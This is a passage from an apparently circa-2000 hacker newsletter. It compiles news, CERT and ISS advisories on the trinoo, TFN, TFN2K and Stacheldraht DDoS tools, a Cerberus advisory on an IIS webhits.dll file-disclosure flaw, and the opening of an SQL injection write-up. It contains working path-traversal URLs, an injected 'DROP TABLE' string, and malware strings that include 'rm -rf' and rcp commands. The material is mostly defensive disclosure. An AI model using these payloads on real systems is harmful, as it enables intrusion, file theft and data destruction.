'open' autopatch - it now requires a code and subaudible PL tone) actually
closed down the repeater site for some time and caused unknown harassing
traffic to the 911 operators fielding the bogus calls.
The pirate is not totally safe however. much like Kevin was apprehended by
Tsutomu thru lax use of his cellphone and some radio direction finding gear
(RDF) so can the 2m pirate be tracked through RDF triangulation, several
grass roots groups do nothing but track down pirate signals or sometimes for
competition, random placed signals, in what is known as the 'Fox Hunt'. But
this requires lots of manpower and the willingness to get out there and help
do some tracking.
Epilogue
I truly hope Kevin is allowed to get back into one of his lifetime loves but
he may find that there are too many caveats with new features and computer
integration into the repeater systems, mailboxes and the like are common place
on repeaters, and so are email gateways, so it is conceivable that one could
inadvertantly get into trouble through the grey lines of technology....
Meanwhile, all the best to Kevin and his family, and hopefully you learned a
little bit about amateur radio's offerings along the way, peace out.
Cruciphux
cruciphux@dok.org
Editor HWA.hax0r.news newsletter.
http://welcome.to/HWA.hax0r.news/
Further reading:
http://www.arrl.org - The main site of the American Radio Relay League
http://www.qrz.com/ - If you know the callsign of the operator his docs are
published publically in a database which can be searched
online here. Also contains other info and links.
http://www.freekevin.com/ - You know, like more info than you need on KDM.
@HWA
08.0 Distrubuted Attacks on the rise. TFN and Trinoo.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CMP Techweb : http://www.techweb.com/wire/story/TWB19991130S0010
Intruders Get Under A Network's
Skin
(11/30/99, 5:40 p.m. ET) By Rutrell Yasin, InternetWeek
A rise in rogue distributed denial of service
tools being installed on networks by intruders
has prompted the Computer Emergency
Response Team (CERT) Coordination Center
to help companies thwart the large coordinated
packet flooding attacks.
CERT, a watchguard organization, has issued an
advisory on two tools--trinoo and Tribe Flood Network
(TFN)--after receiving reports from organizations
affected by the tools.
The tools "appear to be undergoing active development,
testing, and deployment on the Internet," according to a
CERT incident note.
So far, the tools have been installed on thousands of
servers or workstations in about 100 enterprise sites, said
Kevin Houle, CERT's incident response team leader.
While the type of packet flooding attacks the tools
generate are not new, the scope of the attacks can have
a devastating impact on an enterprise network, industry
experts and IT managers agreed.
Both trinoo and TFN enable an intruder to launch
coordinated attacks from many sources against one or
more targets. In essence, the tools use bandwidth from
multiple systems on diverse networks to generate potent
attacks.
The tools "can generate very large denial of service
attacks that consume as much as one gigabyte of data
per second," said Houle. To put that in perspective:
Rather than using one BB gun to hit a target, a hacker
now has the equivalent of 1,000 BB guns, Houle said.
Or the effects can be more like a shotgun, said Mike
Hagger, vice president of security at Oppenheimer
Funds. These tools can "be deadly and can bring a
company to its knees in a matter of seconds," Hagger
said.
These rogue distributed tools are usually installed on host
servers that have been compromised by exploiting known
security holes, such as various Remote Procedural Call
vulnerabilities, according to CERT.
Trinoo is used to launch coordinated UDP flood attacks
from many sources. A trinoo network consists of a small
number of servers and a large number of clients. To
initiate an attack, an intruder connects to a trinoo server
and instructs it to launch an attack against one or more
IP addresses. The trinoo server then communicates with
the clients, giving them instructions to attack one or more
IP addresses for a specified period of time, CERT said.
In addition to UDP flood attacks, TFN can generate
TCP SYN flood, ICMPecho request flood, and ICMP
directed broadcasts or smurf attacks. The tool can
generate packets with spoofed source IP addresses. To
launch an attack with TFN, an intruder instructs a client
or server program to send attack instructions to a list of
TFN servers or clients.
In its alert, CERT has issued a number of steps IT
managers can take to thwart distributed denial of service
attacks. To prevent installation of distributed attack tools
on networked systems, users should stay up to date with
security patches to operating systems and applications
software.
IT managers should also continuously monitor their
networks for signature of distributed attack tools. For
example, if a company uses intrusion detection systems,
IT should tune it to recognize signs of trinoo or TFN
activity.
Since a site under attack may be unable to communicate
via the Internet during an attack, security policies should
include "out of the band communications with upstream
network operators or emergency response teams,"
CERT advised.
@HWA
CERT Advisory:
http://www.cert.org/incident_notes/IN-99-07.html
CERT® Incident Note IN-99-07
The CERT Coordination Center publishes incident notes to provide
information about incidents to the Internet community.
Distributed Denial of Service Tools
Updated: December 8, 1999 (added DSIT Workshop paper and IN-99-05)
Thursday, November 18, 1999
Overview
We have received reports of intruders installing distributed denial of
service tools. Tools we have encountered utilize distributed technology
to create large networks of hosts capable of launching large coordinated
packet flooding denial of service attacks.
We have seen distributed tools installed on hosts that have been
compromised due to exploitation of known vulnerabilities. In particular,
we have seen vulnerabilities in various RPC services exploited. For more
information see the following CERT Incident Notes:
IN-99-04, Similar Attacks Using Various RPC Services
IN-99-05, Systems Compromised Through a Vulnerability in am-utils
Two of the tools we have seen are known as trinoo (or trin00) and tribe
flood network (or TFN). These tools appear to be undergoing active
development, testing, and deployment on the Internet.
Descriptions
Trinoo
Tribe Flood Network
Trinoo
Trinoo is a distributed tool used to launch coordinated UDP flood denial
of service attacks from many sources. For more information about various
UDP flood attacks, please see CERT Advisory CA-96.01. A trinoo network
consists of a small number of servers, or masters, and a large number of
clients, or daemons.
A denial of service attack utilizing a trinoo network is carried out by
an intruder connecting to a trinoo master and instructing that master to
launch a denial of service attack against one or more IP addresses. The
trinoo master then communicates with the daemons giving instructions to
attack one or more IP addresses for a specified period of time.
1.intruder -------> master; destination port 27665/tcp
2.master -------> daemons; destination port 27444/udp
3.daemons -------> UDP flood to target with randomized destination ports
The binary for the trinoo daemon contains IP addresses for one or more
trinoo master. When the trinoo daemon is executed, the daemon announces
it's availability by sending a UDP packet containing the string "*HELLO*"
to it's programmed trinoo master IP addresses.
daemon -------> masters; destination port 31335/udp
The trinoo master stores a list of known daemons in an encrypted file
named "..." in the same directory as the master binary. The trinoo master
can be instructed to send a broadcast request to all known daemons to
confirm availability.
Daemons receiving the broadcast respond to the master with a UDP packet
containing the string "PONG".
1.intruder -------> master; destination port 27665/tcp
2.master -------> daemons; destination port 27444/udp
3.daemons -------> master; destination port 31335/udp
All communications to the master on port 27665/tcp require a password,
which is stored in the daemon binary in encrypted form. All communications
with the daemon on port 27444/udp require the UDP packet to contain the
string "l44" (that's a lowercase L, not a one).
The source IP addresses of the packets in a trinoo-generated UDP flood
attack are not spoofed in versions of the tool we have seen. Future
versions of the tool could implement IP source address spoofing.
Regardless, a trinoo-generated denial of service attack will most likely
appear to come from a large number of different source addresses.
We have seen trinoo daemons installed under a variety of different names,
but most commonly as
ns
http
rpc.trinoo
rpc.listen
trinix
rpc.irix
irix
Running strings against the daemon and master binaries produces output
similar to this (we have replaced master IP address references in the
daemon binary with X.X.X.X)
trinoo daemon
trinoo master
socket ---v
bind v1.07d2+f3+c
recvfrom trinoo %s
%s %s %s l44adsl
aIf3YWfOhw.V. sock
PONG 0nm1VNMXqRMyM
*HELLO* 15:08:41
X.X.X.X Aug 16 1999
X.X.X.X trinoo %s [%s:%s]
X.X.X.X bind
read
*HELLO*
... rest omitted ...
Tribe Flood Network
TFN, much like Trinoo, is a distributed tool used to launch coordinated
denial of service attacks from many sources against one or more targets.
In additional to being able to generate UDP flood attacks, a TFN network
can also generate TCP SYN flood, ICMP echo request flood, and ICMP
directed broadcast (e.g., smurf) denial of service attacks. TFN has
the capability to generate packets with spoofed source IP addresses.
Please see the following CERT Advisories for more information about
these types of denial of service attacks.
CA-96.01, TCP SYN Flooding and IP Spoofing Attacks
CA-98.01, "smurf" IP Denial of Service Attacks
A denial of service attack utilizing a TFN network is carried out by an
intruder instructing a client, or master, program to send attack
instructions to a list of TFN servers, or daemons. The daemons then
generate the specified type of denial of service attack against one
or more target IP addresses. Source IP addresses and source ports can
be randomized, and packet sizes can be altered.
A TFN master is executed from the command line to send commands to TFN
daemons. The master communicates with the daemons using ICMP echo reply
packets with 16 bit binary values embedded in the ID field, and any
arguments embedded in the data portion of packet. The binary values,
which are definable at compile time, represent the various instructions
sent between TFN masters and daemons.
Use of the TFN master requires an intruder-supplied list of IP addresses
for the daemons. Some reports indicate recent versions of TFN master may
use blowfish encryption to conceal the list of daemon IP addresses.
Reports also indicate that TFN may have remote file copy (e.g., rcp)
functionality, perhaps for use for automated deployment of new TFN
daemons and/or software version updating in existing TFN networks.
We have seen TFN daemons installed on systems using the filename td.
Running strings on the TFN daemon binary produces output similar to this.
%d.%d.%d.%d
ICMP
Error sending syn packet.
tc: unknown host
3.3.3.3
mservers
randomsucks
skillz
rm -rf %s
ttymon
rcp %s@%s:sol.bin %s
nohup ./%s
X.X.X.X
X.X.X.X
lpsched
sicken
in.telne
Solutions
Distributed attack tools leverage bandwidth from multiple systems on
diverse networks to produce very potent denial of service attacks. To
a victim, an attack may appear to come from many different source
addresses, whether or not IP source address spoofing is employed by
the attacker. Responding to a distributed attack requires a high degree
of communication between Internet sites. Prevention is not straight
forward because of the interdependency of site security on the Internet;
the tools are typically installed on compromised systems that are outside
of the administrative control of eventual denial of service attack targets.
There are some basic suggestions we can make regarding distributed denial
of service attacks:
Prevent installation of distributed attack tools on your systems
Remain current with security-related patches to operating systems and
applications software. Follow security best-practices when administrating
networks and systems.
Prevent origination of IP packets with spoofed source addresses
For a discussion of network ingress filtering, refer to RFC 2267, Network
Ingress Filtering: Defeating Denial of Service Attacks which employ IP
Source Address Spoofing
Monitor your network for signatures of distributed attack tools
Sites using intrusion detection systems (e.g., IDS) may wish to establish
patterns to look for that might indicate trinoo or TFN activity based on
the communications between master and daemon portions of the tools. Sites
who use pro-active network scanning may wish to include tests for installed
daemons and/or masters when scanning systems on your network.
if you find a distributed attack tool on your systems
It is important to determine the role of the tools installed on your system.
The piece you find may provide information that is useful in locating and
disabling other parts of distributed attack networks. We encourage you to
identify and contact other sites involved.
If you are involved in a denial of service attack
Due to the potential magnitude of denial of service attacks generated by
distributed networks of tools, the target of an attack may be unable to
rely on Internet connectivity for communications during an attack. Be
sure your security policy includes emergency out-of-band communications
procedures with upstream network operators or emergency response teams
in the event of a debilitating attack.
In November 1999, experts addressed issues surrounding distributed-systems
intruder tools. The DSIT Workshop produced a paper where workshop
participants examine the use of distributed-system intruder tools and provide
information about protecting systems from attack by the tools, detecting the
use of t
he tools, and responding to attacks.
Results of the Distributed-Systems Intruder Tools Workshop
Acknowledgments
The CERT/CC would like to acknowledge and thank our constituency and our
peers for important contributions to the information used in this Incident
Note.
This document is available from:
http://www.cert.org/incident_notes/IN-99-07.html
Articles of interest:
Characterizing and Tracing Packet Floods Using Cisco Routers
http://www.cisco.com/warp/public/707/22.html
Improving Security on Cisco Routers
http://www.cisco.com/warp/public/707/21.html
Internet Security Advisories:
http://www.cisco.com/warp/public/707/advisory.html
Additional info, ISS advisory on Trinoo/Tribe variants:
-----BEGIN PGP SIGNED MESSAGE-----
ISS Security Alert
February 9, 2000
Denial of Service Attack using the TFN2K and Stacheldraht programs
Synopsis:
A new form of Distributed Denial of Service (DDoS) attack has been
discovered following the release of the trin00 and Tribe Flood Network (TFN)
denial of service programs (see December 7, 1999 ISS Security Alert at
http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful
than any previous denial of service attack observed on the Internet. A
Distributed Denial of Service attack is designed to bring a network down by
flooding target machines with large amounts of traffic. This traffic can
originate from many compromised machines, and can be managed remotely using
a client program. ISS X-Force considers this attack a high risk since it can
potentially impact a large number of organizations. DDoS attacks have proven
to be successful and are difficult to defend against.
Description:
Over the last two months, several high-capacity commercial and educational
networks have been affected by DDoS attacks. In addition to the trin00 and
TFN attacks, two additional tools are currently being used to implement this
attack: TFN2K and Stacheldraht. Both of these tools are based on the
original TFN/trin00 attacks described in the December ISS Security Alert.
Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or
Stacheldraht) on hundreds of compromised machines and direct this network of
machines to initiate an attack against single or multiple victims. This
attack occurs simultaneously from these machines, making it more dangerous
than any DoS attack launched from a single machine.
Technical Information:
TFN2K:
The TFN2K distributed denial of service system consists of a client/server
architecture.
The Client:
The client is used to connect to master servers, which can then perform
specified attacks against one or more victim machines. Commands are sent
from the client to the master server within the data fields of ICMP, UDP,
and TCP packets. The data fields are encrypted using the CAST algorithm and
base64 encoded. The client can specify the use of random TCP/UDP port
numbers and source IP addresses. The system can also send out "decoy"
packets to non-target machines. These factors make TFN2K more difficult to
detect than the original TFN program.
The Master Server:
The master server parses all UDP, TCP, and ICMP echo reply packets for
encrypted commands. The master server does not use a default password when
it is selected by the user at compile time.
The Attack:
The TFN2K client can be used to send various commands to the master for
execution, including commands to flood a target machine or set of target
machines within a specified address range. The client can send commands
using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks
cause the target machine to slow down because of the processing required to
handle the incoming packets, leaving little or no network bandwidth.
Possible methods for detection of these flooding attacks are recommended in
the TFN/trin00 December 7, 1999 ISS Security Alert. TFN2K can also be used
to execute remote commands on the master server and bind shells to a
specified TCP port.
TFN2K runs on Linux, Solaris, and Windows platforms.
Stacheldraht (Barbed Wire):
Stacheldraht consists of three parts: the master server, client, and agent
programs.
The Client:
The client is used to connect to the master server on port 16660 or port
60001. Packet contents are blowfish encrypted using the default password
"sicken", which can be changed by editing the Stacheldraht source code.
After entering the password, an attacker can use the client to manage
Stacheldraht agents, IP addresses of attack victims, lists of master
servers, and to perform DoS attacks against specified machines.
The Master Server:
The master server handles all communication between client and agent
programs. It listens for connections from the client on port 16660 or 60001.
When a client connects to the master, the master waits for the password
before returning information about agent programs to the client and
processing commands from the client.
The Agent:
The agent listens for commands from master servers on port 65000. In
addition to this port, master server/agent communications are also managed
using ICMP echo reply packets. These packets are transmitted and replied to
periodically. They contain specific values in the ID field (such as 666,
667, 668, and 669) and corresponding plaintext strings in the data fields
(including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a
"heartbeat" between agent and master server, and to determine source IP
spoofing capabilities of the master server. The agent identifies master
servers using an internal address list, and an external encrypted file
containing master server IP addresses. Agents can be directed to "upgrade"
themselves by downloading a fresh copy of the agent program and deleting the
old image as well as accepting commands to execute flood attacks against
target machines.
The Attack:
Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood
attacks. The attacks can run for a specified duration, and SYN floods can be
directed to a set of specified ports. These flood attacks cause the target
machine to slow down because of the processing required to handle the
incoming packets, leaving little or no network bandwidth. Possible methods
for detection of these flooding attacks are discussed in the TFN/trin00 ISS
Security Alert published December 7, 1999.
Stacheldraht runs on Linux and Solaris machines.
Detecting TFN2K/Stacheldraht related attacks:
ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial
of Service attacks that these distributed tools use, providing early warning
and response capabilities. RealSecure can reconfigure firewalls and routers
to block the traffic. On some firewalls this can be as granular as blocking
a particular service or protocol port. In conjunction with the December 7,
1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the
communications between the distributed components of TFN and trin00.
RealSecure will add signatures to detect TFN2K and Stacheldraht in its next
release, which will also include an X-press Update capability to speed
future signature deployment.
Additional Information:
ISS worked in coordination with CERT, SANS, and the NIPC. The following is
additional information regarding these DDoS attacks:
- - Advisory CA-2000-01 Denial-of-Service Developments
http://www.cert.org/advisories/CA-2000-01.html
- - SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000
- - http://www.fbi.gov/nipc/trinoo.htm
- - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
About ISS
ISS is a leading global provider of security management solutions for
e-business. By offering best-of-breed SAFEsuite(tm) security software,
comprehensive ePatrol(tm) monitoring services, and industry-leading
expertise, ISS serves as its customers' trusted security provider protecting
digital assets and ensuring the availability, confidentiality and integrity
of computer systems and information critical to e-business success. ISS'
security management solutions protect more than 5,000 customers including 21
of the 25 largest U.S. commercial banks, 9 of the 10 largest
telecommunications companies and over 35 government agencies. Founded in
1994, ISS is headquartered in Atlanta, GA, with additional offices
throughout North America and international operations in Asia, Australia,
Europe and Latin America. For more information, visit the ISS Web site at
www.iss.net or call 888-901-7477.
Copyright (c) 2000 by Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent of
the X-Force. If you wish to reprint the whole or any part of this Alert in
any other medium excluding electronic medium, please e-mail xforce@iss.net
for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well
as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to: X-Force xforce@iss.net of
Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBOKHygjRfJiV99eG9AQGLhQP+L2H4KNHtP2Tl9YT3P5OIkbSrIszC8lW/
iDM8+6wkz0POcjNDXNHNDpVb203Yv+tjdBu/q6cP7QYVeZ9PUElUfXcN6a4bJTpH
OOaARlvyPRFiArxvFgdIbypsFhTWxc4blJOMb8rbBZgzEa7pZiBzZQibN54l3E1A
vg77CCVq3W8=
=sMAK
-----END PGP SIGNATURE-----
@HWA
09.0 Teen charged with hacking
~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm
Student charged with hacking
Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to
Bulgaria.
BY HOWARD MINTZ Mercury News Staff Writer
A federal grand jury in San Jose on Wednesday indicted a former Princeton
University student suspected of hacking into the computer system of a Palo
Alto e-commerce company and stealing nearly 2,000 credit card numbers.
In the government's latest attempt to hunt down a computer hacker, federal
prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old
native of Bulgaria who is believed to have fled the United States after
school officials confronted him about his computer activities.
According to the U.S. Attorney's office in San Jose, Pentchev left the
country in late 1998, shortly after the alleged hacking incident occurred.
Law enforcement officials believe Pentchev went to Bulgaria and were
unclear Wednesday what diplomatic obstacles there may be to returning him
to this country to face charges.
The four-count indictment charges Pentchev with violating federal computer
laws by hacking into an undisclosed Palo Alto company between Nov. 20 and
Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as
user names and passwords of that company's customers. The indictment does
not specify the company, and federal officials declined to name it.
But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said
the hacking incident shut down one of the company's Web servers for five
days and caused enough chaos in its database that it cost the firm more
than $100,000 to restore its security system.
Authorities have no evidence that Pentchev used the credit card numbers to
commit fraud.
Federal law-enforcement officials do not believe there is a link between
Pentchev and a computer intruder who earlier this month attempted to
extort $100,000 from Internet music retailer CD Universe, claiming to have
stolen as many as 300,000 credit card numbers. The alleged extortionist
was suspected of operating somewhere in Eastern Europe.
That hacker began posting more than 25,000 allegedly stolen card numbers
on a web site Christmas Day. The site eventually was shut down, and
thousands of customers who had shopped at CD Universe canceled their
cards.
In the Bay Area case, investigators said they were able to trace the
computer intrusion to Pentchev because he left evidence in log files in
the company's computer system. ``He wasn't careful about mopping up after
himself,'' Lee said.
Princeton University officials confronted Pentchev about the allegations
in December 1998, and he disappeared shortly thereafter. If convicted,
Pentchev faces a maximum penalty of 17 years in prison.
Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236.
@HWA
10.0 Major security flaw found on Microsoft product
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exclusive: Major security flaw hits Microsoft
http://www.zdnet.co.uk/news/2000/3/ns-12942.html
Thu, 27 Jan 2000 17:03:47 GMT
Will Knight
More embarrassment for Microsoft security as yet another
flaw is discovered. Will Knight brings you this exclusive
report
A British security expert claims to have uncovered a major
security flaw in Microsoft's Web server software, Internet
Information Server 4 (IIS).
David Litchfield a Windows NT specialist with British firm
Cerberus Information Security, says the latest exploit against a
Microsoft product allows a malicious hacker to gain unauthorised
access to sensitive files, including cached or stored credit card
details, address information, user IDs and passwords. Of most
concern is the way these details can be seized: typing a simple
URL into any browser makes it possible to gain access to files on
Web servers running IIS, that have not been specifically
configured to disable the exploit.
According to Litchfield, the situation is serious. "It takes no
expertise [to use this technique] at all. It's so easy to exploit, I dare
not give out a specific example. It would just fall into the hands of
script kiddies [a copycat who uses someone else's techniques to
hack a system]." ZDNet UK News has a copy of the exploit
technique.
Thousands of e-commerce Web sites use IIS prompting Litchfield
to warn a number of high profile UK e-commerce sites he
believed were vulnerable.
Last year Microsoft suffered a major PR blow when its Hotmail
service -- the world's leading Web based email service -- was left
open to attack by a similarly simple hacking technique. But it is not
just Microsoft's products that are vulnerable to attack: there have
been several security breaches of high-profile e-commerce Web
sites illustrating the precarious nature of the fledgling technology.
Visa, for example, recently confirmed receiving ransom demands
from individuals claiming to be able to bring down their computer
system. E-commerce Web site CDUniverse was also struck by a
computer hacker who stole hundreds of credit card numbers and
published them on the Internet.
Mark Tennant, Microsoft product manager for NT Server told
ZDNet UK News, Thursday that although Microsoft products had
made headlines recently for its security flaws, it was to be
expected. "This product is a mainstream product with millions of
users, obviously with that many users flaws are more likely to be
picked up." Ostensibly that might be true, but to observers, those
who see Microsoft products hacked time and again, isn't it a
worrying pattern?
Tennant disagrees and drew comparisons with Linux "which
doesn't have millions of users so you therefore don't hear of this
type of issue". He added: "Microsoft is completely committed to
security." Asked if that commitment could guarantee Windows
2000 -- NT's big brother due next month -- would not suffer the
same sort of security flaws as its predecessor Tennant said: "I
cannot predict what could happen a month down a line... but we
are committed to security."
Litchfield suggests the pressure put on organisations to get online,
by both government and software houses has led to companies
leaving themselves wide open to computer criminals. "The World
Wide Web is a hacker's paradise," he remarks. "The lure of
e-commerce as an effective channel to further promote a business
and fuel its success has led to too many companies getting
'connected' too quickly, sacrificing security for speed."
Security consultant Neil Barrett from another security firm, UK
Information Risk Management, agrees: "The Holy Grail to any
hacker is the remote access exploit. In the past problems with IIS
have mainly been denial of service. If this exploit does what it says
it does, it's down to how well credit card details are protected on
a system which we know from experience is not very well at all."
As a first defence Barrett advises either an intrusion detection
system or encryption or ideally "both".
Full details of the exploit are available from the Cerberus Web site
at this address:http://www.cerberus-infosec.co.uk/adviishtw.html
and a patch for Internet Information Server 4 may be downloaded
from the Microsoft security home page.
What do you think? Tell the Mailroom. And read what
others have said.
@HWA
11.0 Cerberus Information Security Advisory (CISADV000126)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: win2k security list
Date: Jan 26th
Cerberus Information Security Advisory (CISADV000126)
http://www.cerberus-infosec.co.uk/advisories.html
Released : 26th January 2000
Name : Webhits.dll buffer truncation
Affected Systems: Microsoft Windows NT 4 running Internet Information
Server 4 All service Packs
Issue : Attackers can access files outside of the web virtual
directory system and view ASP source
Author : David Litchfield (mnemonix@globalnet.co.uk)
Microsoft Advisory :
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
Internet Information Server 4.0 ships with an ISAPI application webhits.dll
that provides hit-highlighting functionality for Index Server. Files that
have the extention .htw are dispatched by webhits.dll.
A vulnerability exists in webhits however that allows an attacker to break
out
of the web virtual root file system and gain unathorized access to
other files on the same logical disk drive, such as customer databases,
log files or any file they know or can ascertain the path to. The same
vulnerability can be used to obtain the source of Active Server Pages or
any other server side script file which often contain UserIDs and
passwords as well as other sensitive information.
*** WARNING ****
Even if you have no .htw files on your system you're probably
still vulnerable! A quick test to show if you are vulnerable:
go to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw
If you receive a message stating the "format of the QUERY_STRING
is invalid" you _are_ vulnerable. Cerberus Information Security's
free vulnerability scanner - CIS - now contains a check for this
issue - available from the website http://www.cerberus-infosec.co.uk/
*** WARNING ****
Details
*******
This vulnerability exploits two problems and for the sake of clarity
this section will be spilt into two.
1) If you DO have .htw files on your system
****************************************
The hit-highlighting functionality provided by Index Server allows
a web user to have a document returned with their original search
terms highlighted on the page. The name of the document is passed
to the .htw file with the CiWebHitsFile argument. webhits.dll,
the ISAPI application that deals with the request, opens the file
highlights accordingly and returns the resulting page. Because
the user has control of the CiWebHitsFile argument passed to the
.htw file they can request pretty much anything they want. A secondary
problem to this is the source of ASP and other scripted pages can
be revealed too.
However, webhits.dll will follow double dots and so an attacker is able
to gain access to files outside of the web virtual root.
For example to view the web access logs for a given day the attacker would
build the following URL
http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../win
nt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Ful
l
Sample .htw files often installed and left on the system are
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to
loopback)
2) If you DON'T have any .htw files on your system
**************************************************
To invoke the webhits.dll ISAPI application a request needs to be made
to a .htw file but if you don't have any on your web server you might wonder
why you are still vulnerable - requesting a non-existent .htw file will
fail.
The trick is to be able to get inetinfo.exe to invoke webhits.dll but
then also get webhits.dll to access an existing file. We achevie this
by crafting a special URL.
First we need a valid resource. This must be a static file such as a .htm,
.html, .txt or even a .gif or a .jpg. This will be the file opened by
webhits.dll as the template file.
Now we need to get inetinfo.exe to pass it along to webhits for dispatch and
the only way we can do this is by requesting a .htw file.
http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w
3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
will fail. Obviously. There is no such file on the system with that name.
Notice we've now invoked webhits, however, and by placing a specific number
of spaces (%20s) between the exisiting resource and the .htw it is then
possible to trick the web service: The buffer that holds the name of the
.htw
file to open is truncated, causing the .htw part to be removed and therefore
when it comes to webhits.dll attempting to open the file it succeeds and we
are then returned the contents of the file we want to access without there
actually being a real .htw file on the system.
The code is probably doing something similar to this:
FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
Here webhits.dll "contains" a function called DoesTemplateExist() and is
passed
a pointer to a 260 byte long string buffer containing the path to the .htw
file
to open but this buffer is further reduced in length by the strncpy()
function
removing whatever was stored in the last ten bytes (in this case the .htw of
the
HTTP REQUEST_URI) so when fopen() is called it succeeds. This happens
because
Windows NT will ignore trailing spaces in a file name.
Solution
********
.htw needs to be unassociated from webhits.dll
To do this open the Internet Server Manager (MMC). In the left hand pane
right click the computer you wish to administer and from the menu that pops
up choose Properties.
From the Master Properties select the WWW Service and then click Edit. The
WWW Service Master properties window should open. From here click on the
Home Directory tab and then click the Configuration button. You should
be presented with an App Mappings tab in the Application Mappings window.
Find the .htw extention and then highlight it then click on remove. If a
confirmation
window pops up selected Yes to remove. Finally click on Apply and select
all of the child nodes this should apply to and then OK that. Now close all
of the WWW Service property windows.
About Cerberus Information Security, Ltd
****************************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other
security auditing services. They are the developers of CIS (Cerberus'
Internet
security scanner) available for free from their website:
http://www.cerberus-infosec.co.uk
To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally
they continually research operating system and popular service software
vulnerabilites
leading to the dicovery "world first" issues. This not only keeps the team
sharp
but also helps the industry and vendors as a whole ultimately protecting the
end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major
vulnerabilities have been discovered by the Cerberus Security Team - over 40
to date,
making them a clear leader of companies offering such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd
are located in London, UK but serves customers across the World. For more
information
about Cerberus Information Security, Ltd please visit their website or call
on
+44(0) 181 661 7405
Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
12.0 "How I hacked Packetstorm Security" by Rainforest Puppy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- Advisory RFP2K01 ------------------------------ rfp.labs ------------
"How I hacked PacketStorm"
A look at hacking wwwthreads via SQL
------------------------------- rain forest puppy / rfp@wiretrip.net ---
Table of contents:
-1. Scope of problem
-2. Long explaination of SQL hacking
-3. Solution
-4. Conclusion
-5. Included perl scripts
------------------------------------------------------------------------
----[ 1. Scope of problem
Many applications are vulnerable to various forms of SQL hacking. While
programs know they should avoid strcpy() and giving user data to a
system() call, many are unaware of how SQL queries can be tampered with.
This is more of a technical paper than an advisory, but it does explain
how I used a vulnerability in the wwwthreads package to gain
administrative access and some 800 passwords to PacketStorm's discussion
forum.
----[ 2. Long explaination of SQL hacking
As with any other day, I was surfing around the PacketStorm forums, which
use wwwthreads. The URL parameters (the cruft after the '?' in an URL) of
the forums started catching my eye. Being the web security puppy I am, I
started getting curious. So using an ultra-insightful hacking technique,
I changed the 'Board=general' parameter to read 'Board=rfp' used with the
showpost.pl script. Lo and behold I get the following error given to me:
We cannot complete your request. The reason reported was:
Can't execute query:
SELECT B_Main,B_Last_Post
FROM rfp
WHERE B_Number=1
. Reason: Table 'WWWThreads.rfp' doesn't exist
Seeing there's also a 'Number=1' parameter, we can figure this query can
be reconstructed as
SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number
Now, if any of you have read my phrack 54 article (the SQL appension part,
available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can
see where I'm going. We can not only substitute a $Board name and
$Number, but also extra SQL commands. Imagine if $Board were to equal
'general; DROP TABLE general; SELECT * FROM general ' This would translate
into
SELECT B_Main,B_Last_Post FROM general; DROP TABLE general;
SELECT * FROM general WHERE B_Number=$Number
Now the ';' is generic for ending a command. Normally we could use a '#'
for mySQL to ignore everything else on the line; however, the 'FROM'
clause is on a separate line than the 'WHERE' clause, so mySQL won't
ignore it. Considering that invalid SQL will cause mySQL to not run any
